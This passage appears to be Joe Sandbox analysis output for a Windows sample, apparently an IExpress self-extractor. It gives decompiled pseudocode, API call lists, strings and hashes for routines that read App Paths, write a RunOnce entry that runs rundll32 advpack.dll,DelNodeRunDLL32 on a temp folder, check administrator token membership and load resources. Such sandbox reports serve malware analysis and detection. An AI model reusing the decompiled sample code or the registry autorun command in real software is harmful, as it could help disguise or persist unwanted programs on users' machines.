                                                                                                                                                                                                      											goto L9;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											_t59 = 0x104;
                                                                                                                                                                                                      											E00A61680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                      											L10:
                                                                                                                                                                                                      											_t50 = 1;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								RegCloseKey(_v284);
                                                                                                                                                                                                      								L15:
                                                                                                                                                                                                      								if(_t50 == 0) {
                                                                                                                                                                                                      									goto L16;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                      			}
























                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharUpperA.USER32(FEEDC76E,00000000,00000000,00000000), ref: 00A627A8
                                                                                                                                                                                                      • CharNextA.USER32(0000054D), ref: 00A627B5
                                                                                                                                                                                                      • CharNextA.USER32(00000000), ref: 00A627BC
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62829
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,00A61140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62852
                                                                                                                                                                                                      • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62870
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A628A0
                                                                                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A628AA
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00A628B9
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A627E4
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                      • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                      • API String ID: 2659952014-2428544900
                                                                                                                                                                                                      • Opcode ID: 5d010ac85102f579502d6d1cd77dcc4858f1a8ffbb0cface446c52a4869d1d3d
                                                                                                                                                                                                      • Instruction ID: c423f08e4a79258bb6b426c9ef5658b919fa9a0a50f6b64821df633337605f79
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5d010ac85102f579502d6d1cd77dcc4858f1a8ffbb0cface446c52a4869d1d3d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75419371E00128AFDB249B649C85BEA7BBDEB65700F0440A9F545E3150DBB48E868FA1
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 62%
                                                                                                                                                                                                      			E00A62267() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v836;
                                                                                                                                                                                                      				void* _v840;
                                                                                                                                                                                                      				int _v844;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t19;
                                                                                                                                                                                                      				intOrPtr _t33;
                                                                                                                                                                                                      				void* _t38;
                                                                                                                                                                                                      				intOrPtr* _t42;
                                                                                                                                                                                                      				void* _t45;
                                                                                                                                                                                                      				void* _t47;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				signed int _t51;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t19 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                      				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                      				if( *0xa68530 != 0) {
                                                                                                                                                                                                      					_push(_t49);
                                                                                                                                                                                                      					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                      						_push(_t38);
                                                                                                                                                                                                      						_v844 = 0x238;
                                                                                                                                                                                                      						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                      							_push(_t47);
                                                                                                                                                                                                      							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                      							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      								E00A6658A( &_v268, 0x104, 0xa61140);
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							_push("C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      							E00A6171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                      							_t42 =  &_v836;
                                                                                                                                                                                                      							_t45 = _t42 + 1;
                                                                                                                                                                                                      							_pop(_t47);
                                                                                                                                                                                                      							do {
                                                                                                                                                                                                      								_t33 =  *_t42;
                                                                                                                                                                                                      								_t42 = _t42 + 1;
                                                                                                                                                                                                      							} while (_t33 != 0);
                                                                                                                                                                                                      							RegSetValueExA(_v840, "wextract_cleanup3", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                      						_pop(_t38);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_pop(_t49);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                      			}




















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A622A3
                                                                                                                                                                                                      • RegQueryValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000000,?,?,00000001), ref: 00A622D8
                                                                                                                                                                                                      • memset.MSVCRT ref: 00A622F5
                                                                                                                                                                                                      • GetSystemDirectoryA.KERNEL32 ref: 00A62305
                                                                                                                                                                                                      • RegSetValueExA.ADVAPI32(?,wextract_cleanup3,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A6236E
                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00A6237A
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00A62321
                                                                                                                                                                                                      • wextract_cleanup3, xrefs: 00A6227C, 00A622CD, 00A62363
                                                                                                                                                                                                      • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A6232D
                                                                                                                                                                                                      • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A62299
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Value$CloseDirectoryOpenQuerySystemmemset
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Software\Microsoft\Windows\CurrentVersion\RunOnce$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup3
                                                                                                                                                                                                      • API String ID: 3027380567-1455616767
                                                                                                                                                                                                      • Opcode ID: 107cdd671dc58cf7cceed32bc8de79ebab382e6fec2fc7a53e27490fd66d2590
                                                                                                                                                                                                      • Instruction ID: c54ed9140caecfbd20015f4c79cc441a023cdb268ebea253c289284d8ee05388
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 107cdd671dc58cf7cceed32bc8de79ebab382e6fec2fc7a53e27490fd66d2590
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E3318171A00218BBDB21DB61DC49FEA7B7CEB65700F0401A9F50EAA151EA75AB89CF50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 87%
                                                                                                                                                                                                      			E00A63100(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                      				void* _t8;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				struct HWND__* _t16;
                                                                                                                                                                                                      				struct HWND__* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t8 = _a8 - 0xf;
                                                                                                                                                                                                      				if(_t8 == 0) {
                                                                                                                                                                                                      					if( *0xa68590 == 0) {
                                                                                                                                                                                                      						SendDlgItemMessageA(_a4, 0x834, 0xb1, 0xffffffff, 0);
                                                                                                                                                                                                      						 *0xa68590 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					L13:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t11 = _t8 - 1;
                                                                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                                                                      					L7:
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					L8:
                                                                                                                                                                                                      					EndDialog(_a4, ??);
                                                                                                                                                                                                      					L9:
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t15 = _t11 - 0x100;
                                                                                                                                                                                                      				if(_t15 == 0) {
                                                                                                                                                                                                      					_t16 = GetDesktopWindow();
                                                                                                                                                                                                      					_t33 = _a4;
                                                                                                                                                                                                      					E00A643D0(_t33, _t16);
                                                                                                                                                                                                      					SetDlgItemTextA(_t33, 0x834,  *0xa68d4c);
                                                                                                                                                                                                      					SetWindowTextA(_t33, "cent");
                                                                                                                                                                                                      					SetForegroundWindow(_t33);
                                                                                                                                                                                                      					_t34 = GetDlgItem(_t33, 0x834);
                                                                                                                                                                                                      					 *0xa688b8 = GetWindowLongA(_t34, 0xfffffffc);
                                                                                                                                                                                                      					SetWindowLongA(_t34, 0xfffffffc, E00A630C0);
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_t15 != 1) {
                                                                                                                                                                                                      					goto L13;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a12 != 6) {
                                                                                                                                                                                                      					if(_a12 != 7) {
                                                                                                                                                                                                      						goto L9;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L7;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_push(1);
                                                                                                                                                                                                      				goto L8;
                                                                                                                                                                                                      			}










                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,00000000), ref: 00A6313B
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00A6314B
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000834), ref: 00A6316A
                                                                                                                                                                                                      • SetWindowTextA.USER32(?,cent), ref: 00A63176
                                                                                                                                                                                                      • SetForegroundWindow.USER32(?), ref: 00A6317D
                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000834), ref: 00A63185
                                                                                                                                                                                                      • GetWindowLongA.USER32(00000000,000000FC), ref: 00A63190
                                                                                                                                                                                                      • SetWindowLongA.USER32(00000000,000000FC,00A630C0), ref: 00A631A3
                                                                                                                                                                                                      • SendDlgItemMessageA.USER32(?,00000834,000000B1,000000FF,00000000), ref: 00A631CA
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
                                                                                                                                                                                                      • String ID: cent
                                                                                                                                                                                                      • API String ID: 3785188418-3940384054
                                                                                                                                                                                                      • Opcode ID: 7c3c4cd01a85b570d659bfcd13d93d43fa7d5644147edfd64b5308d4b6ce9858
                                                                                                                                                                                                      • Instruction ID: e442be7dd5027a65c644502e423a3b38724abd302e06c3a7f7e2cc4ab62cd9eb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7c3c4cd01a85b570d659bfcd13d93d43fa7d5644147edfd64b5308d4b6ce9858
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C118132644251BBEF11DFA49C0CB9A3A78FB5B721F100711F926A51E0DBF59A43CB52
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 91%
                                                                                                                                                                                                      			E00A618A3(void* __edx, void* __esi) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				char _v20;
                                                                                                                                                                                                      				long _v24;
                                                                                                                                                                                                      				void* _v28;
                                                                                                                                                                                                      				void* _v32;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				long _t45;
                                                                                                                                                                                                      				void* _t49;
                                                                                                                                                                                                      				int _t50;
                                                                                                                                                                                                      				void* _t52;
                                                                                                                                                                                                      				signed int _t53;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t51 = __esi;
                                                                                                                                                                                                      				_t49 = __edx;
                                                                                                                                                                                                      				_t23 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                      				_t25 =  *0xa68128; // 0x2
                                                                                                                                                                                                      				_t45 = 0;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t50 = 2;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if(_t25 != _t50) {
                                                                                                                                                                                                      					L20:
                                                                                                                                                                                                      					return E00A66CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(E00A617EE( &_v20) != 0) {
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					if(_v20 != 0) {
                                                                                                                                                                                                      						 *0xa68128 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                      					L17:
                                                                                                                                                                                                      					CloseHandle(_v28);
                                                                                                                                                                                                      					_t25 = _v20;
                                                                                                                                                                                                      					goto L20;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_push(__esi);
                                                                                                                                                                                                      					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                      					if(_t52 == 0) {
                                                                                                                                                                                                      						L16:
                                                                                                                                                                                                      						_pop(_t51);
                                                                                                                                                                                                      						goto L17;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                      						L15:
                                                                                                                                                                                                      						LocalFree(_t52);
                                                                                                                                                                                                      						goto L16;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						if( *_t52 <= 0) {
                                                                                                                                                                                                      							L14:
                                                                                                                                                                                                      							FreeSid(_v32);
                                                                                                                                                                                                      							goto L15;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                      						_t50 = _t15;
                                                                                                                                                                                                      						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                      							_t45 = _t45 + 1;
                                                                                                                                                                                                      							_t50 = _t50 + 8;
                                                                                                                                                                                                      							if(_t45 <  *_t52) {
                                                                                                                                                                                                      								continue;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							goto L14;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xa68128 = 1;
                                                                                                                                                                                                      						_v20 = 1;
                                                                                                                                                                                                      						goto L14;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A617EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A618DD), ref: 00A6181A
                                                                                                                                                                                                        • Part of subcall function 00A617EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A6182C
                                                                                                                                                                                                        • Part of subcall function 00A617EE: AllocateAndInitializeSid.ADVAPI32(00A618DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A618DD), ref: 00A61855
                                                                                                                                                                                                        • Part of subcall function 00A617EE: FreeSid.ADVAPI32(?,?,?,?,00A618DD), ref: 00A61883
                                                                                                                                                                                                        • Part of subcall function 00A617EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A618DD), ref: 00A6188A
                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A618EB
                                                                                                                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00A618F2
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A6190A
                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 00A61918
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A6192C
                                                                                                                                                                                                      • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A61944
                                                                                                                                                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A61964
                                                                                                                                                                                                      • EqualSid.ADVAPI32(00000004,?), ref: 00A6197A
                                                                                                                                                                                                      • FreeSid.ADVAPI32(?), ref: 00A6199C
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000), ref: 00A619A3
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 00A619AD
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2168512254-0
                                                                                                                                                                                                      • Opcode ID: 9b560a3160c124a03383caa89a3f11ab446a9328f201284af2535918a4cbfba5
                                                                                                                                                                                                      • Instruction ID: dfb234c96ad70649ebc742448edec53d58968b24b876fdaca9e935aa476f1245
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b560a3160c124a03383caa89a3f11ab446a9328f201284af2535918a4cbfba5
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F7312A72A00209AFDB20DFE5DC98AAFBFBCFF14704F140529E645E2160DB759946CB61
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00A6468F(CHAR* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                                                                      				long _t4;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				CHAR* _t14;
                                                                                                                                                                                                      				void* _t15;
                                                                                                                                                                                                      				long _t16;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 = __ecx;
                                                                                                                                                                                                      				_t11 = __edx;
                                                                                                                                                                                                      				_t4 = SizeofResource(0, FindResourceA(0, __ecx, 0xa));
                                                                                                                                                                                                      				_t16 = _t4;
                                                                                                                                                                                                      				if(_t16 <= _a4 && _t11 != 0) {
                                                                                                                                                                                                      					if(_t16 == 0) {
                                                                                                                                                                                                      						L5:
                                                                                                                                                                                                      						return 0;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t15 = LockResource(LoadResource(0, FindResourceA(0, _t14, 0xa)));
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					__imp__memcpy_s(_t11, _a4, _t15, _t16);
                                                                                                                                                                                                      					FreeResource(_t15);
                                                                                                                                                                                                      					return _t16;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t4;
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                      • SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                      • FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                      • LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                      • memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                      • FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$Find$FreeLoadLockSizeofmemcpy_s
                                                                                                                                                                                                      • String ID: TITLE$cent
                                                                                                                                                                                                      • API String ID: 3370778649-3553536280
                                                                                                                                                                                                      • Opcode ID: cb4aecd85523ac7084c0bc43d07146538440ce2c3b54c032dc531dd79023adca
                                                                                                                                                                                                      • Instruction ID: bec952571145b318d38db9b3718bb3df9c2777fc58d06b24fabae3523ca79b18
                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb4aecd85523ac7084c0bc43d07146538440ce2c3b54c032dc531dd79023adca
                                                                                                                                                                                                      • Instruction Fuzzy Hash: BA01A9362442107BE3505BE5AC4DF6B7E3DEBDAF51F050414FA4AA7150C9F18C428BB6
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 57%
                                                                                                                                                                                                      			E00A617EE(intOrPtr* __ecx) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				short _v12;
                                                                                                                                                                                                      				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                      				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                      				void* _v24;
                                                                                                                                                                                                      				intOrPtr* _v28;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                      				long _t28;
                                                                                                                                                                                                      				void* _t35;
                                                                                                                                                                                                      				struct HINSTANCE__* _t36;
                                                                                                                                                                                                      				signed int _t38;
                                                                                                                                                                                                      				intOrPtr* _t39;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t14 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                      				_v12 = 0x500;
                                                                                                                                                                                                      				_t37 = __ecx;
                                                                                                                                                                                                      				_v16.Value = 0;
                                                                                                                                                                                                      				_v28 = __ecx;
                                                                                                                                                                                                      				_t28 = 0;
                                                                                                                                                                                                      				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                      				if(_t36 != 0) {
                                                                                                                                                                                                      					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                      					_v20 = _t20;
                                                                                                                                                                                                      					if(_t20 != 0) {
                                                                                                                                                                                                      						 *_t37 = 0;
                                                                                                                                                                                                      						_t28 = 1;
                                                                                                                                                                                                      						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                      							_t37 = _t39;
                                                                                                                                                                                                      							 *0xa6a288(0, _v24, _v28);
                                                                                                                                                                                                      							_v20();
                                                                                                                                                                                                      							if(_t39 != _t39) {
                                                                                                                                                                                                      								asm("int 0x29");
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      							FreeSid(_v24);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					FreeLibrary(_t36);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                      			}



















                                                                                                                                                                                                      0x00a6188a
                                                                                                                                                                                                      0x00a618a2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A618DD), ref: 00A6181A
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A6182C
